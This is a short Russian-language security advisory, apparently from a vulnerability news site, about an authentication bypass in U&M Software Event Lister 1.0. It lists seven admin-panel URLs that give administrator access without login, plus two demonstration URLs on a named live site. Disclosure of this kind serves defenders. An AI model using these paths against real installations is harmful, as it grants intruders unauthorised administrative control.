Программа: U&M Software Event Lister 1.0

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки, позволяющей
обойти механизм аутентификации и войти в систему с правами администратора.

Эксплоит:

Используйте один из следующих путей для входа с правами администратора.

http://localhost/[path]/admin/start.php
http://localhost/[path]/admin/aktivitet.php
http://localhost/[path]/admin/prop_aktivitet.php
http://localhost/[path]/admin/kategorier.php
http://localhost/[path]/admin/konfig.php
http://localhost/[path]/admin/security.php
http://localhost/[path]/admin/manual.php

Демонстрация:

http://www.justlistit.uochm.com/demo/admin/start.php
http://www.justlistit.uochm.com/demo/admin/index.php



Оставить мнение